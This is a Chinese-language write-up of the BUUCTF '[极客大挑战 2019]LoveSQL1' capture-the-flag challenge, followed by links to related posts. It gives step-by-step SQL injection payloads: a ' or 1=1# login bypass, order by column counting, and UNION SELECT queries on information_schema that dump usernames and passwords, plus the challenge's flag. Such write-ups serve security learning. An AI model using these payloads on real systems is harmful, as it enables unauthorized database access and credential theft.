BUUCTF---[极客大挑战 2019]LoveSQL1

简介: BUUCTF---[极客大挑战 2019]LoveSQL1

1.题目描述

2.一般遇到登录,用户名会尝试admin,密码会尝试万能密码" or 1=1#或者' or 1=1#。这里尝试了第一种,但是不对。

3.接着尝试第二种' or 1=1#。提示登录成功了说明这里是单引号注入,并给了一串字符

4.sql注入题一般会设计到数据库,因为会用到select查询,所以我们得要知道它的表中有多少列,于是我们用order by来查询列数。

经过两次对比可说明,一共有4列。

5.接下来用联合查询查表,在登录界面的密码框输入下面这段代码,就可以得到表名,一共得到两个表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

6.接着查表中有哪些字段,先查第一张表在密码输入框输入下面代码(查看geekuser表中字段),就得到了字段名,三个。

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

7.接下来查第二张表的字段,在密码输入框中输入下面代码,可以得到字段名,发现和第一张表的字段名一样。

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

8.最后分别查询字段里面的信息,先查第一张表中的字段信息。

1' union select 1,2,group_concat(id,username,password) from geekuser#

9.最后查第二张表的字段信息


 
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
 

10.flag为

flag{35943351-4544-4af1-a33e-d5e3dde29eda}

11.这是我耗时最长的一道题,但是能弄清它的思路对我来说是受益匪浅的。

相关文章
|
SQL 数据库 数据安全/隐私保护
BUUCTF[极客大挑战 2019]EasySQL1
BUUCTF[极客大挑战 2019]EasySQL1
[极客大挑战 2019]Havefun1
[极客大挑战 2019]Havefun1
|
Web App开发 Go PHP
BUUCTF---[极客大挑战 2019]Http1
BUUCTF---[极客大挑战 2019]Http1
|
数据安全/隐私保护 Windows
BUUCTF Windows系统密码 1
BUUCTF Windows系统密码 1
836 0
BUUCTF Windows系统密码 1
|
SQL 数据库 数据安全/隐私保护
[极客大挑战 2019]LoveSQL1 题目分析与详解
[极客大挑战 2019]LoveSQL1 题目分析与详解
1366 0
|
PHP 数据安全/隐私保护 C语言
BUUCTF---[极客大挑战 2019]BuyFlag1
BUUCTF---[极客大挑战 2019]BuyFlag1
BUUCTF---[ACTF2020 新生赛]BackupFile1
BUUCTF---[ACTF2020 新生赛]BackupFile1
|
数据库 数据安全/隐私保护
BUUCTF---[极客大挑战 2019]BabySQL1
BUUCTF---[极客大挑战 2019]BabySQL1